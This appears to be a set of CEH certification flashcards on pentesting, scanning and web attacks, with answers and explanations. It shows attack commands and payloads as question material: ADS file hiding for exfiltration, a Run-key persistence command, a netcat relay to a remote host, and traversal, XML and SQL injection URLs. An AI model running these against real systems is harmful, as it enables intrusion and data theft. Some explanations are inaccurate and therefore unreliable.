CEH 41-80 Flashcards
Christina is conducting a penetration test against Dion Training’s network. The goal of this engagement is to conduct data exfiltration of the company’s exam database without detection. Christina enters the following command into the terminal:
-=-=-=-=-=-=-
C:\database\exams.db>c:\Users\Christina\Desktop\beachpic.png:exams.db
-=-=-=-=-=-=-
Next, Christina emailed the beachpic.png file to her personal email account. Which of the following techniques did she use to exfiltrate the file?
A. NTFS encryption
B. Alternate data streams
C. Unquoted service path
D. DLL hijacking
B. Alternate data streams
OBJ-3.2: An alternate data stream (ADS) is a feature of Microsoft’s NT File System (NTFS) that enables multiple data streams for a single file name by forking one or more files to another. ADS can be abused by hiding one file into another, as shown in this scenario. Once received in her email, she could access the database by opening the file as “beachpic.png:exams.db”.
Which command-line tool could you use on a Windows system to enable an inactive administrator account?
A. taskkill
B. robocopy
C. net user
D. gpresult
C. net user
Explanation:
OBJ-3.2: There are several net command utilities that you can use to view and configure shared resources on a Windows network. The net user command allows system administrators to manage user accounts on Windows PCs. You can use the command to display account information or make changes to user accounts. It can be used, among other things, to enable the inactive administrator account of a Windows system.
Which type of malware is used to actively attempt to steal confidential information by capturing a user’s data when typed into a web browser or other application?
A. Spyware
B. Keylogger
C. Trojan
D. Rootkit
B. Keylogger
Explanation
OBJ-3.3: A keylogger actively attempts to steal confidential information by capturing the data when entered into the computer by the user. This is done by recording keystrokes entered into a web browser or other application. A software keylogger can be run in the background on a victim’s computer. A hardware keylogger may be placed between the USB port and the wired keyboard.
A cybersecurity analyst just finished conducting an initial vulnerability scan and is reviewing their results. To avoid wasting time on results that are not really a vulnerability, the analyst wants to remove any false positives before remediating the findings. Which of the following is an indicator that something in their results would be a false positive?
A. A finding that shows the scanner compliance plug-ins are not up-to-date
B. Items classified by the system as Low or as For Informational Purposes Only
C. A scan result showing a version that is different from the automated asset inventory
D. A ‘HTTPS entry that indicates the web page is securely encrypted
B. Items classified by the system as Low or as For Informational Purposes Only
(Correct)
Explanation
OBJ-3.1: When conducting a vulnerability scan, it is common for the report to include some findings that are classified as “low” priority or “for informational purposes only.” These are most likely false positives and can be ignored by the analyst when starting their remediation efforts. “An HTTPS entry that indicates the web page is securely encrypted” is not a false positive but a true negative (a non-issue). A scan result showing a different version from the automated asset inventory should be investigated and is likely a true positive. A finding that shows the scanner compliance plug-ins are not up-to-date would likely also be a true positive that should be investigated.
You were interpreting a Nessus vulnerability scan report and identified a vulnerability in the system with a CVSS attack vector rating of A. Based on this information, which of the following statements would be true?
A. The attacker must have physical or logical access to the affected system
B. Exploiting the vulnerability requires the existence of specialized conditions
C. The attacker must have access to the local network that the system is connected to
D. Exploiting the vulnerability does not require any specialized conditions
A. The attacker must have physical or logical access to the affected system
Explanation
OBJ-3.1: The attack vector explains what type of access that the attacker must have to a system or network and does not refer to the types of specialized conditions that must exist. In this case, the A rating refers to Adjacent, where the attacker must launch the attack from the same shared physical (such as Bluetooth or Wi-Fi network), logical network (such as a local subnet), or a limited administrative domain (such as a VPN or MPLS). An attack vector of Network (N) would allow the attack to extend beyond these options and conduct remote exploitation of the vulnerability. An attack vector of Local (L) would require the attacker to locally exploit the workstation via the keyboard or over an SSH connection. An attack vector of Physical (P) would require the attacker to physically touch or manipulate the vulnerable component themselves, such as conducting a cold boot attack.
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v beacon /d C: \Windows\Temp\beacon.bat
-=-=-=-=-=-=-
Which of the following types of persistence is Matt trying to utilize?
A. Services
B. Scheduled task
C. Registry startup
D. PS remoting
C. Registry startup
Explanation
OBJ-3.2: A penetration tester can use the “reg add” command to cause a particular program or command to start every time the Windows machine is booted up. To achieve this, the penetration tester stores the program in the HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run and HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run registry keys. The first one will cause the program to run whenever any user logs into the machine. The second will only cause the program to start when the victimized user logs in again.
A vulnerability scan has returned the following results:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Detailed Results
10.56.17.21 (APACHE-2.4)
Windows Shares
Category: Windows CVE ID: - Vendor Ref: - Bugtraq ID: - Service Modified - 8.30.2017
Enumeration Results: print$ c:\windows\system32\spool\drivers files c:\FileShare\Accounting Temp c:\temp -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
What best describes the meaning of this output?
A. There is an unknown bug in an Apache server with no Bugtraq ID
B. Connecting to the host using a null session allows enumeration of the share names on the host
C. Windows Defender has a known exploit that must be resolved or patched
D. There is no CVE present, so this is a false positive caused by Apache running on a Windows server
B. Connecting to the host using a null session allows enumeration of the share names on the host
Explanation
OBJ-3.1: These results from the vulnerability scan conducted shows an enumeration of open Windows shares on an Apache server. The enumeration results show three share names (print$, files, Temp) were found using a null session connection. There is no associated CVE with this vulnerability, but it is not a false positive. Not all vulnerabilities have a CVE associated with them. Nothing in this output indicates anything concerning Windows Defender, so this is not the correct answer. Bugtraq IDs are a different type of identification number issued for vulnerabilities by SecurityFocus. Generally, if there is a CVE, there will also be a Bugtraq ID. Both the CVE and Bugtraq ID being blank is not suspicious since we are dealing with a null enumeration result.
What SCAP component provides a list of entries that contains an identification number, a description, and a public reference for each publicly known weakness in a piece of software?
A. XCCDF
B. CPE
C. CCE
D. CVE
D. CVE
Explanation
<
OBJ-3.1: The Common Vulnerabilities and Exposures (CVE) system provides a reference-method for publicly known information-security vulnerabilities and exposures. XCCDF (extensible configuration checklist description format) is a language that is used in creating checklists for reporting results. The Common Configuration Enumeration (CCE) provides unique identifiers to system configuration issues to facilitate fast and accurate correlation of configuration data across multiple information sources and tools. Common Platform Enumeration (CPE) is a standardized method of describing and identifying classes of applications, operating systems, and hardware devices present among an enterprise’s computing assets.
You walked up behind a penetration tester in your organization and saw the following output on their Kali Linux terminal:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[ATTEMPT] target 192.168.1.142 – login “root” – pass “abcde” 1 of 10
[ATTEMPT] target 192.168.1.142 – login “root” – pass “efghi” 2 of 10
[ATTEMPT] target 192.168.1.142 – login “root” – pass “12345” 3 of 10
[ATTEMPT] target 192.168.1.142 – login “root” – pass “67890” 4 of 10
[ATTEMPT] target 192.168.1.142 – login “root” – pass “a1b2c” 5 of 10
[ATTEMPT] target 192.168.1.142 – login “user” – pass “abcde” 6 of 10
[ATTEMPT] target 192.168.1.142 – login “user” – pass “efghi” 7 of 10
[ATTEMPT] target 192.168.1.142 – login “user” – pass “12345” 8 of 10
[ATTEMPT] target 192.168.1.142 – login “user” – pass “67890” 9 of 10
[ATTEMPT] target 192.168.1.142 – login “user” – pass “a1b2c” 10 of 10
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
What type of test is the penetration tester currently conducting?
A. Conducting a port scan of 192.168.1.142
B. Conducting a brute force login attempt of a remote service on 192.168.1.142
C. Conducting a ping sweep of 192.168.1.142/24
D. Conducting a Denial of Service attack on 192.168.1.142
B. Conducting a brute force login attempt of a remote service on 192.168.1.142
xplanation
OBJ-3.2: The penetration tester is attempting to conduct a brute force login attempt of a remote service on 192.168.1.142, as shown by the multiple login attempts with common usernames and passwords. A brute force attack attempts to crack a password or username or find a hidden web page, or find the key used to encrypt a message, using a trial and error approach and hoping, eventually, to guess correctly. Port Scanning is the name for the technique used to identify open ports and services available on a network host. A denial-of-service (DoS) attack occurs when legitimate users cannot access information systems, devices, or other network resources due to a malicious cyber threat actor’s actions. A ping sweep is a basic network scanning technique used to determine which range of IP addresses map to live hosts.
Windows file servers commonly hold sensitive files, databases, passwords, and more. What common vulnerability is usually used against a Windows file server to expose sensitive files, databases, and passwords?
A. Cross-site scripting
B. SQL injection
C. Missing patches
D. CRLF injection
C. Missing patches
Explanation
OBJ-3.2: Missing patches are the most common vulnerability found on both Windows and Linux systems. When a security patch is released, attackers begin to reverse engineer the security patch to exploit the vulnerability. If your servers are not patched against the vulnerability, they can become victims of the exploit, and the server’s data can become compromised. Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. Cross-site scripting focuses on exploiting a user’s workstation, not a server. CRLF injection is a software application coding vulnerability that occurs when an attacker injects a CRLF character sequence where it is not expected. SQL injection is the placement of malicious code in SQL statements via web page input. SQL is commonly used against databases, but they are not useful when attacking file servers.
You have just finished running a vulnerability scan of the network and are reviewing the results. The first result in the report shows the following vulnerability:
You log into the MySQL server and verify that you are currently running version 3.5.3. Based on the item shown on the image, what best describes how you should categorize this finding?
A. True negative
B. True positive
C. False negative
D. False positive
D. False positive
Explanation
OBJ-3.1: You should categorize the results as a false positive. Based on the scenario and output, your server is not vulnerable to a remote code execution for the identified vulnerability. You are already running MySQL v3.5.3 that is greater than v3.3.x or above. This indicates that the vulnerability scanner falsely identified your MySQL version as an earlier and more vulnerable version. The system incorrectly identified a vulnerability, but the vulnerability doesn’t exist on your system. Therefore this is a false positive.
After analyzing and correlating activity from the firewall logs, server logs, and the intrusion detection system logs, a cybersecurity analyst has determined that a sophisticated breach of the company’s network security may have occurred from a group of specialized attackers in a foreign country over the past five months. Up until now, these cyberattacks against the company network had gone unnoticed by the company’s information security team. How would you best classify this threat?
A. Advanced persistent threat (APT)
B. Spear phishing
C. Insider threat
D. Privilege escalation
A. Advanced persistent threat (APT)
Explanation
OBJ-3.3: An advanced persistent threat (APT) is a network attack in which an unauthorized person gains access to a network and stays there undetected for a long period of time. An APT attack intends to steal data rather than to cause damage to the network or organization. An APT refers to an adversary’s ongoing ability to compromise network security, obtain and maintain access, and use various tools and techniques. They are often supported and funded by nation-states or work directly for a nation-states’ government. Spear phishing is the fraudulent practice of sending emails ostensibly from a known or trusted sender to induce targeted individuals to reveal confidential information. An insider threat is a malicious threat to an organization from people within the organization, such as employees, former employees, contractors, or business associates, who have inside information concerning the organization’s security practices, data, and computer systems. Privilege escalation is the act of exploiting a bug, design flaw, or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user. While an APT may use spear phishing, privilege escalation, or an insider threat to gain access to the system, the scenario presented in this question doesn’t specify what method was used. Therefore, APT is the best answer to select.
A cybersecurity analyst is reviewing the logs of an authentication server and saw the following output:
-=-=-=-=–=-=-=-=–=-=-=-=–=-=-=-=–=-=-=-=–=-=-=-=–=-=-=-=-
[443] [https-get-form] host: diontraining.com login: admin password: P@$$w0rd!
[443] [https-get-form] host: diontraining.com login: admin password: C0mpT1@P@$$w0rd
[443] [https-get-form] host: diontraining.com login: root password: P@$$w0rd!
[443] [https-get-form] host: diontraining.com login: root password: C0mpT1@P@$$w0rd
[443] [https-get-form] host: diontraining.com login: dion password: P@$$w0rd!
[443] [https-get-form] host: diontraining.com login: dion password: C0mpT1@P@$$w0rd
[443] [https-get-form] host: diontraining.com login: jason password: P@$$w0rd!
[443] [https-get-form] host: diontraining.com login: jason password: C0mpT1@P@$$w0rd
-=-=-=-=–=-=-=-=–=-=-=-=–=-=-=-=–=-=-=-=–=-=-=-=–=-=-=-=-
What type of attack was most likely being attempted by the attacker?
A. Credential stuffing
B. Session hijacking
C. Password spraying
D. Impersonation
C. Password spraying
Explanation
OBJ-3.2: Password spraying refers to the attack method that takes many usernames and loops them with a single password. We can use multiple iterations using many different passwords, but the number of passwords attempted is usually low compared to the number of users attempted. This method avoids password lockouts, and it is often more effective at uncovering weak passwords than targeting specific users. In the scenario provided, only one or two attempts are being made to each username listed. This is indicative of a password spraying attack instead of a brute force attempt against a single user. Impersonation is the act of pretending to be another person for fraud. Credential stuffing is the automated injection of breached username/password pairs to gain user accounts access fraudulently. This is a subset of the brute force attack category: large numbers of spilled credentials are automatically entered into websites until they are potentially matched to an existing account. The attacker can then hijack for their own purposes. Session hijacking exploits a valid computer session to gain unauthorized access to information or services in a computer system.
An attacker is searching in Google for Cisco VPN configuration files by using the filetype:pcf modifier. The attacker could locate several of these configuration files and now wants to decode any connectivity passwords that they might contain. What tool should the attacker use?
A. Nmap
B. Nessus
C. Cain and Abel
D. Netcat
C. Cain and Abel
Explanation OBJ-3.2: Cain and Abel is a popular password cracking tool. It can recover many password types using methods such as network packet sniffing, cracking various password hashes by using methods such as dictionary attacks, brute force, and cryptanalysis attacks. It also includes a module to conduct Cisco VPN Client Password Decoding too. CUPP is used to create password lists. Nessus is a vulnerability scanner. The netcat tool is used to create reverse shells for remote access.
An attacker has issued the following command: nc -l -p 8080 | nc 192.168.1.76 443. Based on this command, what will occur?
A. Netcat will listen on the 192.168.1.76 interface for 443 seconds on port 8080
B. Netcat will listen on port 8080 and output anything received to a remote connection on 192.168.1.76 port 443
C. Netcat will listen for a connection from 192.168.1.76 on port 443 and output anything received to port 8080
D. Netcat will listen on port 8080 and then output anything received to local interface 192.168.1.76
B. Netcat will listen on port 8080 and output anything received to a remote connection on 192.168.1.76 port 443
Explanation
OBJ-3.2: The proper syntax for netcat (nc) is -l to signify listening and -p to specify the listening port. Then, the | character allows multiple commands to execute during a single command execution. Next, netcat sends the data to the given IP (192.168.1.76) over port 443. This is a common technique to bypass the firewall by sending traffic over port 443 (a secure SSL/TLS tunnel).
You are currently working as a firewall technician. You have received a request to open up a few ports on the firewall to allow a newly VoIP system to operate properly. The installer has requested that the ports associated with SIP, RDP, H.323, and RTP be opened to allow the new system to operate properly. Which of these ports are NOT used by a typical VoIP system?
A. SIP
B. RDP
C. H.323
D. RTP
B. RDP
Explanation
OBJ-4.1: RDP is the protocol for the Remote Desktop Protocol and operates over port 3389. This is not used in a typical VoIP system. SIP (Session Initiation Protocol), H.323 (voice/video conferencing) protocol, and the RTP (Real-time Transport Protocol) are all used heavily in VoIP and video conferencing solutions.
A network technician needs to monitor the network to find a user who is browsing websites against the company policy. What should the technician use to view the website and find the user browsing it?
A. SNMP GET
B. Top listener tool
C. Intrusion detection system
D. Packet sniffer
D. Packet sniffer
Explanation
OBJ-4.1: Packet Sniffers can capture and analyze network user traffic. This information can be queried to view website addresses, contents, and sometimes even the password information. This differs from an intrusion detection system in that IDS’ wait to receive implicitly-malicious data in a network before logging the event.
A security analyst wants to implement a layered defense posture for this network, so he uses multiple antivirus defensive layers, including both an end-user desktop antivirus software and an email gateway scanner. What kind of attack would this approach help to mitigate?
A. Forensic attack
B. ARP spoofing attack
C. Social engineering attack
D. Scanning attack
C. Social engineering attack
Explanation
OBJ-4.2: By utilizing both endpoint protection (desktop antivirus software) and the email gateway scanner, the security analyst works to prevent phishing and other social engineering attacks. Emails are a common attack vector used in social engineering attacks.
A firewall administrator has configured a new DMZ to allow public systems to be segmented from the organization’s internal network. The firewall now has three security zones set: Untrusted (Internet) [143.27.43.0/24]; DMZ (DMZ) [161.212.71.0/24]; Trusted (Intranet) [10.10.0.0/24]. The firewall administrator has been asked to enable remote desktop access from a fixed IP on the remote network to a remote desktop server in the DMZ for the Chief Security Officer to work from his home office after hours. The CSO’s home internet uses a static IP of 143.27.43.32. The remote desktop server is assigned a public-facing IP of 161.212.71.14. What rule should the administrator add to the firewall?
A. Permit 143.27.43.0/24 161.212.71.0/24 RDP 3389
B. Permit 143.27.43.32 161.212.71.14 RDP 3389
C. Permit 143.27.43.32 161.212.71.0/24 RDP 3389
D. Permit 143.27.43.0/24 161.212.71.14 RDP 3389
B. Permit 143.27.43.32 161.212.71.14 RDP 3389
Explanation
OBJ-4.5: Due to the requirement to allow a single remote IP to enter the firewall, the permit statement must start with a single IP in the Untrusted (Internet) zone. Based on the options provided, only 143.27.43.32 could be correct. Next, the destination is a single server in the DMZ, so only 161.212.71.14 could be correct. The destination port should be 3389, which is the port for the Remote Desktop Protocol. Combining these three facts, only “permit 143.27.43.32 161.212.71.14 RDP 3389” could be correct.
A hacker successfully modified the sale price of items purchased through your company’s web site. During the investigation that followed, the security analyst has verified the web server, and the Oracle database was not compromised directly. The analyst also found no attacks that could have caused this during their log verification of the Intrusion Detection System (IDS). What is the most likely method that the attacker used to change the items’ sale price?
A. SQL injection
B. Changing hidden form values
C. Buffer overflow attack
D. Cross-site scripting
B. Changing hidden form values
Explanation
OBJ-5.2: Since there are no indications in the IDS logs, the database, or the server, it is most likely that the hacker changed hidden form values to change the items’ price in the shopping cart. A buffer overflow is an anomaly that occurs when a program overruns the buffer’s boundary and overwrites adjacent memory locations while writing data to a buffer. Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in a browser side script, to a different end-user. SQL injection is a code injection technique used to attack data-driven applications. Malicious SQL statements are inserted into an entry field for execution, such as dumping the database contents to the attacker.
You are analyzing the SIEM for your company’s e-commerce server when you notice the following URL in the logs of your SIEM:
- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
https: //www.diontraining.com/add_to_cart.php?itemId=5”+perItemPrice=”0.00”+quantity=”100”+/> <. item+id=”5&quantity=0 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Based on this line, what type of attack do you expect has been attempted?
A. SQL injection
B. Buffer overflow
C. XML injection
D. Session hijacking
C. XML injection
Explanation
OBJ-5.2: This is an example of an XML injection. XML injection manipulates or compromises the logic of an XML application or service. The injection of unintended XML content and/or structures into an XML message can alter an application’s intended logic. XML Injection can cause the insertion of malicious content into resulting messages/documents. In this case, the URL is attempting to modify the server’s XML structure. The original XML structure would be: . By using the URL above, this would be modified to the following: . The result would be that a new line was added in the XML document that could be processed by the server. This line would allow 10 of the product at $0.00 to be added to the shopping cart, while 0 of the product at $50.00 is added to the cart. This defeats the integrity of the e-commerce store’s add to cart functionality through this XML injection. A SQL injection occurs when data input by a user is interpreted as a SQL command rather than as normal data by the backend database. A buffer overflow is an exploit that attempts to write data to a buffer and exceed that buffer’s boundary to overwrite an adjacent memory location. A session hijacking attack consists of exploiting the web session control mechanism, normally managed for a session token. The real key to answering this question is identifying the XML structured code being entered as part of the URL, shown by the bracketed data.
A cybersecurity analyst is reviewing the logs of a proxy server and saw the following URL, http://test.diontraining.com/../../../../etc/shadow. What type of attack has likely occurred?
A. SQL injection
B. Buffer overflow
C. Directory traversal
D. XML injection
C. Directory traversal
Explanation
OBJ-5.2: This is an example of a directory traversal. A directory traversal attack aims to access files and directories that are stored outside the webroot folder. By manipulating variables or URLs that reference files with “dot-dot-slash (../)” sequences and its variations or using absolute file paths, it may be possible to access arbitrary files and directories stored on the file system, including application source code or configuration and critical system files. A buffer overflow is an exploit that attempts to write data to a buffer and exceed that buffer’s boundary to overwrite an adjacent memory location. XML Injection is an attack technique used to manipulate or compromise an XML application or service’s logic. SQL injection is the placement of malicious code in SQL statements via web page input.
You are conducting a penetration test against the Dion Training test server. You have just run nikto against the server and received the results below:
-=-=-=-=-=-
root@DionTraining:~# nikto -h test.diontraining.com
- Nikto v2.1.6
—————————————————————————
+ Target IP: 164.201.54.34
+ Target Hostname: test.diontraining.com
+ Target Port: 80
+ Start Time: 2020-12-22 13:43:13 (GMT-5)
—————————————————————————
+ Server: Apache/2.4.18 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x2c39 0x53a938fc104ed
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use ‘-C all’ to force check all possible dirs)
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ Uncommon header ‘x-ob_mode’ found, with contents: 1
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 7596 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2016-08-22 06:54:44 (GMT8) (1291 seconds)
—————————————————————————
+ 1 host(s) tested
-=-=-=-=-=-
Based on the results above, which of the following exploits should develop for this engagement?
A. Arbitrary code execution
B. SQL injection
C. Clickjacking
D. Privilege escalation
C. Clickjacking
Explanation
OBJ-5.2: The X-Frame-Options in the HTTP response header can be used to indicate whether or not a browser should be allowed to open a page in frame or iframe. If the X-Frame-Options header is not present, then a clickjacking exploit could be used against the web server’s users. The only two vulnerabilities shown in the Nikto results are the clickjacking vulnerability and the MIME Type security issue.
A cybersecurity analyst is reviewing the logs of a proxy server and saw the following URL, http://test.diontraining.com/index.php?id=1%20OR%2017-7%3d10. What type of attack has likely occurred?
A. Session hijacking
B. SQL injection
C. Buffer overflow
D. XML injection
B. SQL injection
Explanation
OBJ-5.3: This is an example of a Boolean-based SQL injection. This occurs when data input by a user is interpreted as a SQL command rather than as normal data by the backend database. In this example, notice that the statement being parsed as part of the URL after the equal sign is equivalent to 1 or 17-7=10. This means the portion of the statement that is 17-7=10 would return a value of 1 (since it is true). Then, we are left to compute if 1 = 1, and since it does, the SQL database will treat this as a positive authentication. This is simply an obfuscation technique of a 1=1 SQL injection technique. A buffer overflow is an exploit that attempts to write data to a buffer and exceed that buffer’s boundary to overwrite an adjacent memory location. A session hijacking attack consists of exploiting the web session control mechanism, normally managed for a session token. XML Injection is an attack technique used to manipulate or compromise an XML application or service’s logic.
